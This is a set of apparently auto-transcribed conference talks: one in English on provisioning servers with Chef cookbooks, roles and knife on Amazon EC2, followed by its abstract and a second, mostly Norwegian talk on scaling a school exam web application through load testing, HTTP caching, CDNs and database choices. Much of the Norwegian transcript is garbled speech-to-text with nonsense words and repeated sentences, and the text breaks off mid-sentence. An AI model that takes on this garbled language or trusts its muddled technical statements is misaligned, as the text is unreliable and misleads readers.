for example, I have the Apache cookbook here. You'll see it has a couple of folders. I'm not sure if you can see that, but it's, a cookbook typically has like an attributes folder with a lot of attributes. So, these are various configuration terms, which you then, like, there can override if you need to. I'll show you a bit about that soon. And it has a recipes folder. A recipe typically is the code that sort of are executed, which will actually install stuff on the server. So, Chef has these kind of built-in methods that you can use. So, obviously, this is for Linux or Ubuntu, so it has this package thing. So, that will basically do the APT get install Apache 2. And then it has a lot of these conventions, which can tell you that something is a service and can tell you when to sort of start this up. So, there's quite a lot of things here. You can look at that yourself as well. For example, it has this template feature, which will take a template from a template folder. For example, this one. So, this is using standard Ruby ERB template. It's basically just text, and then you can use these tags to sort of add custom stuff to it so it gets set up. So, basically, these are, like, typically all the files that Apache needs to work. And you can then override and change them here. So, that is, like, the basic anatomy of OECookbook. There are a few other concepts as well. So, you have something called roles. So, if you noticed, I had four different servers. There's a web server. There's a server running the search engine. And there's a server that renders some documents. So, you describe that in a role. So, this is my base role, which is shared across all my node types. So, it has this thing called a run list, which basically specify which recipes or which cookbooks and which recipes within that cookbook to use. So, you can see I have, for example, the Chef Client service, which makes sure that the Chef Client runs as a daemon on the service. Like, a few monitoring things, a basic log rotate recipe. So, this is what tells Chef which recipes to run when you run Chef on the server. And you can see here that I've overridden some attributes. So, these are the attributes you would find in the attributes, typically find in the attributes folder in the cookbooks. And you can then go in and override these for the various roles. There's a couple of other concepts. So, you have something called environments, which I'm not using at the moment. I'm just using the default environment. But this is typically where you would have a staging environment and a production environment and test environment. And then you can specify different properties for different environments, at least in theory. And you also have this data bag concept, which is where you would put, it's just another place to put configuration. So, this is a bit confusing because some cookbooks, they use data bags and some use attributes. And it's a bit messy. So, for example, Amazon Ops works there. I think they would just remove the data bag concept completely. So, maybe this will disappear or maybe you'll have recipes that are not compatible across the different kind of flavors of Chef. So, there are, I mean, there's a lot of possibilities and there are some conventions, but it's sort of up to the people who make the cookbooks whether I follow or not. I want to think about data bags that have a supported encryption. Yeah. So, that's probably the reason we use it. Yeah. So, data bag supported encryption, like you were saying. So, yeah, it could be a safer place to store configuration. But that sort of requires that the recipes are supporting it, I guess. A lot of them are to be some ways to work around that. So, that is the basic concept. So, I have obviously cookbooks that I just used, like the global ones. But then I also have my own. I keep them in a separate folder. So, for example, I have a, let's see, a web recipe here. Which I use when I want to install, well, basically set up my server so that I can deploy my application to it. So, it makes sure that the Nginx config, all the necessary libraries are there, that necessary directories with the correct permissions are created. It writes the database configuration file there. It fixes some more permissions. It also, this is kind of a neat feature. So, some cookbooks, they expose something called definitions. So, if I go to the, if I can find the monitor cookbook here, you can see it has a definition called monitor RC. And that's a definition that allows you to call, basically call a function from another cookbook. So, that you can say, okay, I want this file, which should, like, with these parameters, which will monitor my application. And then the cookbook that you call is sort of responsible for knowing where, which folder to use and all that. So, it's kind of quite useful so you don't have to duplicate some configuration and you can, like, reuse things a bit. So, that was that. Let's see it go back to the, yeah. And the same thing here, log rotate also has a definition, allows me to specify which files to log rotate. So, instead of putting this in the log rotate cookbook, which it doesn't really belong because that could be used in different servers, you put it locally in this cookbook because it's more specific to that kind of server. So, that's that. So, I mentioned a bit about environments. They are also sometimes used as the first prefix in the attributes. So, if you look at this, I think I have this elastic search thing here now. Sometimes they are used and sometimes they are not used. So, I have this here. So, you can see how I had to prefix the data bag with default because it would not use the default. This could be, like, here you can have different options for different environments, so that depends that the cookbook actually, when it reads the attributes, it will have a section that says, okay, attributes, environment, then attribute name. Sometimes it's just attribute name more or less directly. So, this can be a bit confusing sometimes. So, that is kind of the basic. So, the public cookbooks that are out there, are sometimes very up to date and very configurable. Sometimes they are totally out of date or they are more or less just hard coded without any configuration. So, that just depends on whoever made it and how many people contributed to it. So, you might have to either write this yourself or you can fork it and fix whatever you need. So, I guess that is something that will just keep improving over time. I thought I'd show you a demo so that might, may or may not work. This is actually to show you, like, how it looks like when you run Chef. So, let's call this 10. I'm going to run this command here, which basically it uses the knife tool and the easy to method of that knife tool to create a server on Amazon with this AMI ID. If you know that, that's sort of the image I want to use. As a user Ubuntu, and I say it should have the base role, the web role, and then, yeah, another role. It should be like a medium size and these are the security groups and the names of that server. So, if everything goes, okay, tested this yesterday, it should first provision a server with Amazon. We can see if it tries to do that. It should pop up here soon as well if it works. So, there we are. Something's going on. So, you can see here it's launching a new server. And once that server is up, it will SSH into it and start first installing Chef. And then it will download all the cookbooks for the different roles assigned to it. And it will start running through the cookbooks in the order I defined in the role. It should first go to the base role if I had it here. It should just start working through these recipes. So, the thing about Chef is that when you run it, it will, if it has already installed something or has already written a file, it won't change, it won't write to it again most of the time. So, it depends if you write, you can obviously execute custom scripts with Chef. So, if you do execute a custom script that will always flip something back or forth, then it will keep changing. So, I did that with some permissions where I first set the permissions in the start of the run and then I changed them with the script at the end of the run. So, then it always restarted my web server because the web server would trigger to be restarted if that file changed. So, that kind of, it restarted every five minutes, took me a while to figure out. But if you use the Chef like methods, it should be idemponent and it won't change stuff unless you ask it to. So, the server is hopefully coming up soon. Then you can start to see how it will run through it. So, I mean, obviously this can be quite powerful. It's just code, so you can do whatever you would do. Normally, you can refactor things and you can have classes and methods and you can loop over things and you can do a lot of powerful stuff. It did take me a while to sort of get up to speed. If you know Ruby from before, that helps. If you know your environment and a lot about operations, that obviously helps. So, coming from a developer perspective, I'm sure I've broken some conventions. I might not have set up the servers the perfect way. Sometimes you can be lucky. So, let's say I wanted to use Elasticsearch and I was like, oh, how do I install that? I found a cookbook and it sort of just worked the first time. Other times you have to really understand what you are installing and know which parameters to tweak. So, now you can see we connected to the server. It then downloads and installs Chef and it starts synchronizing the cookbooks. So, I'll start downloading the cookbooks. I guess what I forgot to mention is that the cookbooks in the folders here, when you check them out or put them in the folder, they are not on the server. You have to specifically upload the cookbook. You have to make sure that the cookbook is uploaded to the server. So, you can make changes locally and you can keep them in the repository or not. You have to upload it to the server. The same with the roles. If you change the roles, you would have to now have a role from file and then you typically upload that role. So, the repository is not what is on the server. You have to upload things. Let's see how it's doing. You can see now it's starting to install stuff. So, it's now trying to install Nginx. What I've noticed is that, or experienced, is that if you have a Chef recipe and you work on it one day or a role and a complete run list, and you run it and it works, the server comes up and then you think, okay, I can just put this to sleep now and if I need it again, I'll just put it up and then three months later you try to run it and something breaks. So, what can happen is that external dependencies can change. So, for example, the operating system, when you ask it to install something, the mirrors that contains the binary files or whatever, or the packages, those kind of expired because new versions have been released. So, what I've had to do a few times is to do the sort of refresh the mirror list or update the package list at the start of the Chef run. So, there is obviously a Chef package for that as well. So, I'm not sure if I can show you that. I'm not sure where I have that now, but it's in search for it. I'll find it later. So, things, external things can change. And also, obviously, if you run this every day, then you probably know the state of it, but if you just run it occasionally, things kind of broken. And another thing is this, I think, will successfully work now. So, at the end of the Chef run, the sort of node will register itself properly with the server. So, if it were to crash halfway through, then you can be in a state where it's like, I don't know. So, then it's probably better to just fix the bug and then you just fire up a new server instead of trying to continue where it crashed. So, you will use potentially a lot of instances. At least that's my experience. But that's easy and cheap these days. Let's see. So, this is not responding yet. Hopefully it will. So, you can see there's quite a lot of stuff I'm installing. If you were to do this manually, or from memory or from nodes, it would be hard to get it right. And so, what I'm doing now is I'll show you the bootstrapping and I'll show you the first Chef run. This will also install Chef as a demon. So, that's optional. So, you can just run Chef once on each server and it will just set it up to the initial state. You can also have the demon running continuously. So, then if you push any changes to attributes or templates, it will then automatically fetch that, like say every five minutes or half an hour. It depends what you set it to. And then install it. So, that is, that can't be quite powerful, quite dangerous as well. It depends. So, okay, now it's engine access responding. I haven't deployed the app to it. So, that's why I got 404. But you can see now it's just one command and you install the whole stack and it's more or less ready to use. We can go into the server and I can show you what will happen if I were to run the Chef client again. I could have done this from local as well with the SSH command. So, now it runs through it, processes, but as you can see it didn't really change anything. It just logged a lot of stuff. So, unless anything changes, it will just run through fairly quickly on the second and third run and so forth. So, as I showed you, I've decided to keep deployment with the app. You can have Chef deploy for you as well. You can regularly check some tag in GitHub and pull it down. And maybe that's what you want if you want the things to just automatically scale and do it yourself. But there's kind of, you have to figure out what fits in the app and what fits in Chef. There's some trade-offs there. So, Windows, I spent the day with Jules trying to get things running on Windows. You probably know a lot more. So, you don't really have SSH on Windows, so you can use WinRM. So, if you saw the bootstrap command that I ran, or I guess that might not work, but Knife also has an SSH command where you can execute. I think I have that here. So, this will be another way to run the Chef client. So, I can do that from locally. So, I would say, but no, Knife SSH and then just the name of the server and then the command to run. So, on Windows, this would be something like Knife WinRM, I think. And then it would more or less do the same thing. I think what I remember from the Windows thing is, well, you have to take restarts into account, because Windows needs to restart a lot when you install new stuff to it. So, the Chef run that I showed you and bootstrap, it would like halfway through it. It would just like, now I have to restart. And it would get back up again and then sort of continue, so that adds some fun to it, I think. So, there's a few things to think about there. A few other things that I have experienced is that, so, OpsCode, the server, the host of the option, it can be down sometimes. So, that hasn't really bothered me because that's not when I was setting up a server or what it meant is just that the Chef client can't contact it. We'll just try again later. But if you really needed to spin up an instance, at that time, you would have a problem. So, I guess you can run the private option and make sure that's up and running, because there's always, you know, there's another dependency. The Chef client or the demon that I have running, it can get stuck, can run out of memory. So, I have this monitor thing that monitors Chef and then Chef makes sure the monitor is running. So, usually, they're always up. But there's a potential where Chef can break the monitor config if I've committed something wrong. And then, monitor will stop and Chef will stop and no one will really tell me whether it's running or not. So, apart from going into this place and just seeing when they last checked in. So, you can see my servers here, two minutes since this guy checked in five minutes. This is the Chef demon running and checking in. What's a bit confusing is that you have a node, which is basically your server. But then, a node also is a client. So, if I were to shut down this other server now, I would have to remember to actually delete it both as a client and as a node. Sometimes, if you're like, okay, I spun this up and I terminate the instance and I want to do it again and give it the same name. It will run through almost everything and then it will crash in the end because it has the same client name or the node name. So, that's a bit annoying. So, remember to delete that. So, the packages I think I mentioned. Chef is Ruby. So, you would think, this is very good with Ruby. So, I'm running a Ruby application. Actually, it's ironic because I had some issues with that because Chef, when it starts up, I think it makes sure that there's a Ruby version there. But then, if you're...it was the time the Ruby version that comes with Ubuntu would be old. And then, you want another version to run your app in. But then, Chef is running on Ruby. So, you have Chef installing another version of Ruby and it can be a bit messy. So, there are ways to do that. But what I just ended up doing is basically just creating an image from scratch and then manually going in there, installing the correct version of Ruby and one or two XML libraries which sometimes they need to be installed. And then, I make an image from that and that is my base image. So, it gets you almost from the start but sometimes you have to do some changes to the images before you can run Chef. I think maybe you do the same with Windows that the VINRM thing and the firewalls needs to be configured manually. And then, you can start with Chef. So, it's almost there but not always. Yeah, for me it was kind of a steep learning curve but it's because I have to understand the Chef concept, how that works. And you also have to understand the operations or the operating system and all the various packages you install. So, every time there is something new, you have to understand that. But if you already know that, maybe it's not as hard. I think I've gone through quite a few things now. I can talk a bit about the, because I had a look at Amazon Opsworks and what they've done is they have a web interface where you can specify different types of nodes and applications. And then you can paste what you would typically put in the roles here. You sort of put these attributes in just like a form on the web. And then the only part that is code is the recipes themselves. So, they have sort of abstracted the way or made put stuff into the UI that would otherwise be code here. You can take your cookbooks and hopefully they can run on Amazon with the Opsworks thing. But the other stuff might not work. So, it will be interesting to see how they kind of affect each other over time. Because maybe some of these things are a bit overengineered, I don't know. We'll find out. I can, maybe anyone has any questions, we can take them now or I can like try to go deeper into something. Yes. Yes. Yes, yes you can. So, I haven't, I've been lazy, so I haven't tested. But yes, it's just code. So, you can obviously stub out things. I mean, you can test it. But obviously, if you run it, it could be more like an integration test because it will actually try to install stuff. So, you can either stub out things or you can, so that, I guess that would be the way you create unit tests and stuff like that. So, you can make sure the loop is working and if this set is set, then it does this, etc. You can write tests for that. But I think also, people are just trying to figure out the best way to do this because the real test is when you actually run it, right? Yeah, I mean, I guess you can, well, you can obviously run it on Amazon, but you can also do locally. I guess you can use, what's called WayGround, something like that, which, where you can test it. And I think there are different ways to do this and people are exploring different options. So, maybe you can run up an instance and then you can get the list of properties or whatever and check if it's correct. So, yeah, just for the record, yeah, a cucumber chef and a cucumber chef spec. I mean, people are doing this, but I think it does involve infrastructure when you want to do the real end-to-end test. So, that could be a bit tricky, but obviously you can test the code. So, I wonder if I had any good examples on, yeah, you can see here I've used kind of the, I guess, the power of Ruby. So, or just have a list of three different names here and then I just loop over them and I then call the built-in command for creating a directory, writing a template and also using that money definition. So, if there's, well, I guess you can do it as PowerShellScript or ShellScript as well, but it's kind of nice to have this in code. Obviously, you can create a method out of this and then you can maybe test it in other ways as well. Any more questions or things you would like to see? I guess the last talk of the day, so it wouldn't hurt to finish off early. But if you have any questions, come up and I'll show you some stuff. Yeah, I guess that's it.
|
There's a reason Heroku is so popular. As developers we often prefer to focus on coding (and sometimes providing business value) over setting up and maintaining servers and infrastructure.Setting up a full stack with e.g. apache/nginx, containers/wrappers, permissions, monitoring, alerts etc. can be a daunting task if you have not experienced it before. Even more terrifying is the thought of having to do it all again (from memory, or some patchy notes) if the server crashes or you need to scale out horizontally. Tools such as Chef and Puppet allow you to document and execute the setup and maintenance of your servers with code. From a developer's perspective I'll show you how "easily" you can setup your own servers with Chef. I'll also share with you my experiences from using Chef for more than a year now. There are some nice tools like Librarian-Chef which helps you keep your Chef-repository cleaner and more organised. Finally I'll talk a bit about when you should reuse cookbooks/recipes from the community and when you should create your own.
|
10.5446/51416 (DOI)
|
Slog Slupp. Hallo, kan dere høre meg? Jeg er her i dag til å spise om skaling av webapplikkjøysten. Jeg håper alle dere er ble tilbake. Min namen er Gautomagnussen. Jeg er webdeveloper og verknæsere konsultant her i Nasslo for webstep. Hvis du vil spise om hvilken skjønne du vil spise om, kom og kompakt meg. Det er en masse kompakt informasjoner. Det er linken til de slags, hvor du kan se alle. De er der i dag, så du kan se det i en real time på din egen komputer. Ja. Først, etter bakgrunnen. Jeg startet å spise om dette. Jeg startet det enn år siden vi skrevet en prototyp for en produkt som skulle give eksammer for barn. Det var etter og etter 50 grader som vi skrevet eksammer på internet. Vi skrevet en prototyp. Det var sålt til 10 skolen. Både en tusen pupiler skrevet eksammer, og det jobber fantastisk. Vi skrevet en system som var dårlig for 5 måneder, og vi skrevet en midtermeskolen. Vi skrevet en mensur. Det jobber så fantastisk med 10 skolen. Vi gjorde det i dag. Vi skrevet det enn år siden. Dette time har vi skrevet det til 2,5.000 skolen. De er alle gjennom det i 2 måneder. Det er ca 150.000 pupiler som skal gjøre et test i 2 måneder. Vi startet å penske på hva det er. Vi må gjøre ca 1.000 rekskjøst per sekund. Vi startet å gjøre en mesur. Vi kan gjøre ca 20 rekskjøst per sekund. Hvorfor går vi opp i 2 måneder? Vi skal gjøre ca 20 rekskjøst per sekund til 1.000. Det er en svært. Vi startet å mesure. Vi starter med en teori først. Hva er en skalabil system? Skalabilitet i systemet. Det er vikipedia-defnisjon. Skalabilitet er en system, et samarbeid eller prosess. Det er ikke om spid eller prosess. Det er ikke om teknologi. Det er ikke om ingen sekund. Det er om å gjøre systemet. Det er ikke om å gjøre systemet. Skalabilitet er en prosess. Men det er ikke det som gjør. Du kan ha en fast performans for en user. Og å brev på to user. Og så er det ikke en svært. Det er ikke en måte å skale fast skalabilitet. Det er ikke en svært. Det er ikke en måte å skale fast skalabilitet. Det gjør ikke noen kost. Selv om min titel mener at det er en system. Det trenger stort og stort atensjon. Så å gjøre systemet under en stor skalabilitet, du må jobbe for det. Vi jobber med ennlige guide-lider. For å avoid pre-matur og optimalisering. Fokus på makrolevel. Så dette betyr at vi har tatt å fokusere... Seriød....... mener jag... pole sill...... mellom tornadoen luf............. Ok, så fokus på operasjoner som tar de mest skjølte resurser. Det er det vi har gjort. Vi har tatt til å finne hva det er som at user spente de mest tid på. Hvordan systemet har brukt resurser. For å gjøre det, må du realisere kjente domene og kjente de utsugte. For å optimere denne utsugte, og ikke bare kjente det som fungerer. Så du må kjente koden, kjente hva det skjer, og dette er vildt viktig. For du må ikke betale. Hvis du betaler, må du kjente at det er en kjente forkorn av appenet. Hvis du har en slags prosess, er det det skjer. Men bare fordi det er slags, det betalte ikke at det er slags til de utsugte. Det må ikke være utsugt så mye. Og du må være rett på hva som kjører. Og hvordan slags det er. Så, hvor starter du? Du starter med å meske. Mesk alle som går på i systemet. Mesk alle utsugte. Gjente Google Analytics, nye reliker, lødetester, profiler, og gjente baser på hva utsugte du er gjennom. Hvordan kan systemet arbeide nå før du starter skaling? Vi hadde 20 reks per sekund, og vi hadde til å gjente 1000. Så det var bare å starte å forstå og få baser. Vi gjorde dette med nye reliker, som du installerer i serveren. Det arbeider som Google Analytics, som skjer på hva som helst. Vi brunner blitz.io for lødetester. Det er en simpelig webbaser. Du signerer inn en måned og gjenter lødetester på hva som du har. Vi gjorde også profiler. Vi brunner en profiler og det er en 30-dag fri profil. Det gav oss en masse bra innsiden til vår kod. Hvis du kombiner alle de tre tingene, det gir deg en stor data, som du kan gjøre alle ting med. Nurellik gav oss skjutskjøpet som dere kan se hva klassen og hva metoder er. De er de som akumulerer mest tid i app. Vi kan se hva som skal gå. Hva er de metoder som gjer mest tid for utsender? Blitz.io gav oss noe som dette, som du kan se. Du kan bare se utsender på systemet og se hva systemet er under lød. Du kan se at i dette scenarioet du gav, vi hadde 200 rekskjøpet per sekund og trygget å kjente litt. Så en drøpp i hva mange reksjøper per sekund kom gjennom. En increase in load time for user. Blitz.io er egentlig en kjøl på webet. For de som du kan kjøle fra Unix, det er bare en kjøl på webreksjøper. Du kan gjøre mange av dem. Det har det samme API som kjøl. Det er også utsender som grinder, appartybenge og visual studio load tester. Men vi gikk like this, for det var bare simpel. Vi hadde feltet vi skulle gjøre en liten liten tid for å gjøre mange ting. I en liten tid, vi nødde fast federen og liten liten tid. En viktig ting er at du har liten liten liten tid. Du skal kunne liten liten system i en måte om minutter, hvis ikke sekund. Du skal ha en god testsuit. Så du vet at når du skjønner noe, systemet er stille operasjonalt. Vi har bare brunnet dette prosess. Vi har bare hatt denne bottleneck. Vi har tatt å ta det. Vi har mesket det igjen, å se om det var liten. Vi har repet det. Vi gjorde dette til vi kunne ikke finne noe. Vi var bra. Vi har brunnet produksjoner. Vi hadde ingen stagning og nødvendig. Vi hadde en separat maskin til å begynne alle. Det er igjen som vår produksjon. Vi gjorde det i produksjonen. Vi begynner systemet nødt til produksjonen på produksjonen. Vi kan se hvordan det har begynt på produksjonen. Det må ikke fungeres for å gjøre det. Men det var en indisjent og en bra måte å begynne med å begynne med å begynne en annen set av computer. Vi har brunnet real data, både for hvordan usernes begynner og hvordan de bruker systemet. Og for hvordan de bruker real maskin. Vi må at least trye å få data som er nødt til at usernes set er potibelt. Hvordan har du plassert en separat versjon eller en versjonsservice? Ok, så Jess Humble. Ok, det var en talk earlier today by Jess Humble. Vi kaller det som en grøn-blå pattern. Vi skulle spørge en annen system på samme maskin. Så, selvfølgelig, det vi fannet ut var ikke det første. Vi kaller det ut veldig snart til usernes eget, fordi vi vil se hvordan det virkelig performer. Hvis du kan gjøre det og gjøre det på en subset, og så klippes det med din baslin, og ser du, at det faktisk fikk det i en real usernes scenario. For du kan møte alt du vil artificiellt, men real usernes er det eneste måte å se at det faktisk virker. Og så klippes det med baslin. Det er det som du ser at du faktisk er forkjørende. Og være klar til å røde tilbake. Det er virkelig viktig. Hvis du gjør noe som koster error til å klippe, faktisk, noe som skjer til usernes, røde tilbake. I en annen til å ha en eget deploiment, du må ha eget rollback. Når du skaler med hardware, har du to opansjoner. Skaling opp eller skaling ut. Du kan se Mr. Bollmer her, en slags skala opp. Skaling opp er usually good up to a point, because scaling with Mac Minnis is probably not the best way to do it. Skaling out is more complex. It requires infrastructure, load balancing, harder deployment, more service to maintain. While scaling up requires that you throw away your old hardware and bind you with a more expensive one. While out you keep the old and just put in another. Skaling up, that's the bigger hardware. It's kind of a quick solution. When you don't know what to do, you just buy more hardware. It's the fastest thing you can do, and it usually works pretty well up to a point. That's the quick solution. Redefining your software is not. Your software isn't capable of scaling out. Then it will cost you money and time. You can buy extreme hardware, like if your database is the thing that really hurts, just buy a really fast Fusion I.O SSD drive. That's ten times as fast as a normal SSD, and you will scale really, really good, really fast. And for a couple of thousand dollars. While scaling with more hardware, that's kind of the fun part. You can do smaller steps and just add one and one machine. But it requires more infrastructure. And of course, since most of us are Microsoft developers and use proprietary software, there's license costs. A lot of licenses, you license per machine, and not per CPU or gigabyte of RAM. It just makes it more complex to pricing more complex on Microsoft environment than on when you're using Linux and open source. Her's how you see scaling as it up versus out. It's a pretty old picture, but the out part is pretty exponentially. While the out will just add smaller, it will be totally linear, and you can add a lot of smaller steps. So if you can, you probably should scale out. And it will give you other good things as well, such as availability. And availability, mostly. Scaling the SQL database. Now, that's the hard thing to scale out. So you probably shouldn't scale your SQL server out. You should scale it up to reasonable amount. Like a big, big box, and then be done with it. If you really need to scale it out, there's something called a replicated read database, which since most web applications, they read a lot more than they write. You can replicate out to similar read databases that has exact the same information as your main database. And it will be performant to read from. If your data is too much, if you have too much data for one machine, then you have to go with other options. So then you have to go with sharding and clustering. And sharding and clustering of the SQL database, that's hard stuff. So if you can, leave it for the Twitter and Facebook, guys. And just scale up as long as you can. At least overnight. So when you're starting to scale out, you need some load balancing. If you're lucky, your hosting provider already has a load balancer. You can just piggyback off. So this makes load balancing pretty easy when you just put two machines, web servers, and ask your hosting provider to just go to one of them. It doesn't matter. Of course, if you don't have a hosting provider, don't have a load balancer, you have to buy one for yourself. There's two options. There's the hardware load balancer and the software one. As hardware load balancer is really just a software load balancer with some expensive hardware. So if you're not afraid to get your hands dirty with Linux and some open source stuff, you can go with the software one. They're also really, really flexible and have a lot of options that you can do. So when you have a load balancer, you can use it for other things as well, like terminating your SSL. So if you use SSL on your web requests, you can use your load balancer to terminate it, and your application server don't have to spend as much CPU power on them. Most load balancers also have the reverse proxy. So if you have caching or use HTTP caching, you can use your load balancer to cache your requests for you. They do it a lot better than IIS does it. You got one less thing to think about. Yes. Using the cloud. So our system was, we had to scale really fast for a short period of time. It sounds like the dream scenario for the cloud. Because the cloud, you can just provision out ten machines, pay for them for a month, and then just give it one machine again and work. And you pay for one month of ten machines. And it was really accepted. Some resources are really hard to provision. And since we had a really high write scenario, because we had thousand write requests per second, we couldn't really get the IO we needed from Azure, who we tried, and we tried Amazon EC2 as well. And I don't know if you have logged into a cloud provider and started a virtual machine, but there's really nowhere you can set, I want this much IO. You have CPUs and RAM, and that's it. So we weren't able to use the cloud, unfortunately. So yeah, it's easy to provision CPU and RAM, not so. To provision IO. We had to port code as well. And we only had a short time to do it. So the cloud didn't really work out for us. It might for you if you have the same scenario. To take full advantage of the cloud, especially things like Azure, you have to go with the databases they want you to go for, and that's Azure table storage. So that's more rewriting we had to do, and not enough time. And the cloud is usually still more expensive than buying your own hardware, especially if you have the network engineers that's required. So using the cloud might work, might not work. So now we have talked about how to scale with hardware. So let's talk about how you can make your code more efficient. So the key here is to take the quick wins first and see where it gets you. And you want it to be efficient because you don't want to scale. You want your software to be able to scale out, but you also want it to scale out as little as possible because you want it to run efficiently on the machines you have. So you can use two machines instead of five or something. So a few tricks. Use HTTP cache. You really should learn how HTTP works and how its caching mechanisms work. There's a lot on HTTP caching, and most people don't use it much. They use it some, but not as much as they could. The trick is to set a long expiration date, one year. And then when your resources change, you have to invalidate your cache. You just change the URL. And then the cached resources will just die after a while. But you don't care. It's on the clients. So again, use your load balancer as a reverse proxy. Or invest in a separate reverse proxy. That way, your reverse proxy has your resources in memory, and you don't have to serve them from the IIS web server yourself. Adding HTTP cache to Windows and IIS is pretty easy. You can just add a web config to a folder you want to be served. This thing will make max age be 365 days. And all your static resources can be cached on your machines, or on client machines, or the reverse proxy for 365 days. They probably won't do it, but at least it's possible. And you will reduce the requests for static content by a lot. So when you have started leveraging HTTP cache, you really should start seeing if there's more content you can make static. So you should see your web pages. They usually consist of some static information like news or content that you show to every user. And then there's the dynamic that's for my user. So if you're a newspaper, you will probably have a lot of static content and very little dynamic. And if you're a Facebook, you will have a lot of dynamic, because the whole news feed is just for you. Well, the static part is not so much. And then you can use JavaScript and merge it together on the UI. Or if you have a reverse proxy, you can use something called Edge Server Includes and merge it together there. And again, use your reverse proxy. You can even save things as files, because files are a lot cheaper to serve than going down in your database. So when you made all your content static, you can upload it to CDN. And CDNs is Content Delivery Networks, which are great for giving you fast, giving you static resources fast. So you should probably try to keep them on CDN if you can. We uploaded all our static content to Amazon S3 and then distributed it with Amazon Cloudfront. It worked really well for us. When this is done, you can bundle your requests. So do things like minimize bundle and version your JavaScript. Use CSS Sprites. You can bundle dynamic queries together, så at you know you're going to ask for two different resources from a web page, you can ask for them at the same time through the same network call. This will make both your server and client appear more efficient. Så det vil høyre forforn. Og det versjoning part, det er det som gjør det som kan gjøre det. Og det er som vi talte om, det er nødvendig å ha en lang eksperisjon date og å opplåde til CDN. Og så er det internalt cash. Dotnet4 har bråd en kjøyring som heter Memory Cash, som er en riktig fin API for at man kan stå i det som er i memory. Det er ikke distribuert. Så hvis du har mange fredsfrontene, så kan det være det samme objektet i cash på en annen machine. Men du kan se noe som heter Layer 7 Load Balancing, som gjør at load balanser ut intelligentlig til den reisne webserver. Og så kan man ikke use distributed caching. Distributed caching er det alle de ganske sider kan se. Så hvis du ser Facebook, Twitter og alle de ganske sider som er ut i det, de bruker memcached og også reddiss. Memcached og reddiss er linnex. Du skal løse linnex til å gjøre det. Men du skal ikke løse linnex om du vil skale. Det er en eksempel om hvor Memory Cash fungerer. Det er gøy. Du kan bare tilgjente et nytt cashitem med en id og et objekt, og en rull til hvor cashet er kjent når det er kjent for å expiere. Du kan se om det er det som sker, og du kan løse og ta det. Det er en veldig løsig app. Reddiss og memcached har det samme app, og du skal gjøre et nettverk-rekje til å få data, så det blir en bit mer spennende. Så, database. Måste av oss bruker SQL Server, og det skal målge å fortsette å brukere SQL Server. Det er viktig å se at forskjellige databases er bra på forskjellige ting. Hvis du har en masse avkjent på din page, Reddiss handler det mer effektivt som SQL Server. Hvis du har grafen, fikk du Facebook, og kjente folk i endelige løpet, er det grafen databases. Hvis du vil ha grafen, kjente valgestorven er det en måte å gå. Du kan mix og match et database, eller et annet database, i det samme app. Det er en veldig god idé å ha et annet database, og en mer database. Se database på usager, og ikke på alt habit, og se SQL Server på alt. Hvis du har selectert databases, er det viktig å forstå dem. Hvis du ikke har alle databases som er feit, i behindre generik repositori, har domain driven design slutt oss inn til å bruke repositoriske, som har en del av og delt av objektgrafen. Det gjør en veldig god sent fra en domain driven perspektiv, men fra en performens og skaling perspektiv, det er ikke så god. På ting du vil skale, bruke et database og bruke den effektivt som du kan. Det har mer feitere som get og app. Og selvfølgelig, du må matche data sammen. Så, remember, du må gjøre så mange databasekål som kan, og gjøre databasekål som du kan. Så, bruke databasekålen, og være sikker på det. Og hvis det sker teg, må du slå å switche til en annen database, og at least add to your existing architecture. Når du startet å gjøre, eller skjønne hvordan dataet er stort, du må trykke å save data som er utgjort. Så hvis du har data som er redd, du må gjøre det løpere å løpe fast. Og ikke gjøre 100 joiner til å få data du skal nøye på skolen. Og det andre mål, når du har en svære utgjort, så gjør det løpere å skjønne. Og mix og match architecture i din app. Du har nogle utgjort cases, hvor du løper og skriver. Databasekålen må reflektes, og koden må reflektes. Du må ikke ha en kukke-kutter-artistisk som fungerer for alt. Du må spesialisere utgjorteskålen du har tatt å solve. Du må ikke ha en kukke-kutter-artistisk som normalisasjoner i SQL. Du har usually enough data storage. Så hvis speeden er... Hvis det er speed du er kjent. Så hvis du må skale med stor data, så må du normalisere mer. Men ikke gjøre det som du har tatt i skolen. Så bare som du må batches din SQL-kåle, du må også batches din network-kåle. Du må ikke betale at in-memorykålen og networkkålen er samme. Så gjør koden reflektes, og gjør det visst at du må gjøre en eksternal kåle. Det er en stor spesialisering som du har tatt i skolen. Og det er en stor spesialisering som du har tatt i skolen. Det er en stor spesialisering som du har tatt i skolen. Og når du gjør eksternal kåle, så må du ha alle data du må ha i samme kåle. Men kjenskjening, du må separe din networkkåle baser på hvordan kjenskjening er done. Sjært hvis du bruker HTTP. Og så må du ha en restendpoint fordi du kan leverere HTTP-kjenskjening i din app. Men remember at dotnet defaultbehagelig er å bypasse HTTP-kjenskjening. Her er en bild fra MSDM og som det ser ut, det ser ut som bypasskjenskjening. Det er det defaultkjenskjening. Den defaultkjenskjening som er det kjenskjening som de mest appleratene skal bruke på hva som det er. MSDM dokumentasjon, det er ikke det defaultkjenskjening. Så hvis du vil bruke kjenskjening i webrequesten i dotnet, du må spørge det. Så bruke defaultkjenskjening. Ok, og så er det utenligere stat. Du må prøve å putte det på klien og kjente en liten userstat som kan være på din server. Så tryk å avvide et oppdrag. Hvis du bruke kjenskjening når du har mange user, det slipper du ned og det tar opp det. Hvis et sessjon er nød, så putter du det i et kjenskjening. Ja, da jeg startet å mye om dette, har jeg ikke kommet til en uskjenskjening hvor jeg hadde å putte hva som i et sessjon. Hvis jeg kunne putte det i kukkes, i URL, eller i JavaScript. Så tryk å putte et stat på klien. Ok, og så er det slik operasjoner. Du må bare trykke å putte det i et bakgrunn. Og remember at ikke alle i et webapplikket har det samme prioritet. Og det er noe som folk bruker å gjøre, så hvis du sender e-mailer, putter det i et bakgrunn. Hvis det er en stor operasjon, putter det i et bakgrunn. Hvis det er svært og du må være synkronisk, så putter det. Bare ta ut et data, eller lette JavaScript, og putte det i et parer, hvis det har vært eller ta ut et reis som sier, her er det som kommer til å gjøre. Hvis det skjører, så kan du sendte en e-mail eller noe, og bare utstå det som skjører. Håbeidst, asynk, er veldig bra for å handle trafikkjære. Hvis du kan, gikk alt, asynk, og alt som skjører, og har mange utstående som skjører sammen, så kan du bare kjøre litt langere. Vi har ikke tid til å bringe inn en menskningskartekter, som en servicebus, eller MSMQ, for vi har to sider. Vi har hatt et løp som var utgjørt av Stack Overflow, som bare har brukt ut høyestet, i ASP.NET, til å kreite tid, og det har bare gjort et bakgrunnfask, som du kan gjøre hverandre, hverandre du vil, så det er bare å runne en trafikkjære i bakgrunn, og du kan prosess, du kan tilfølge 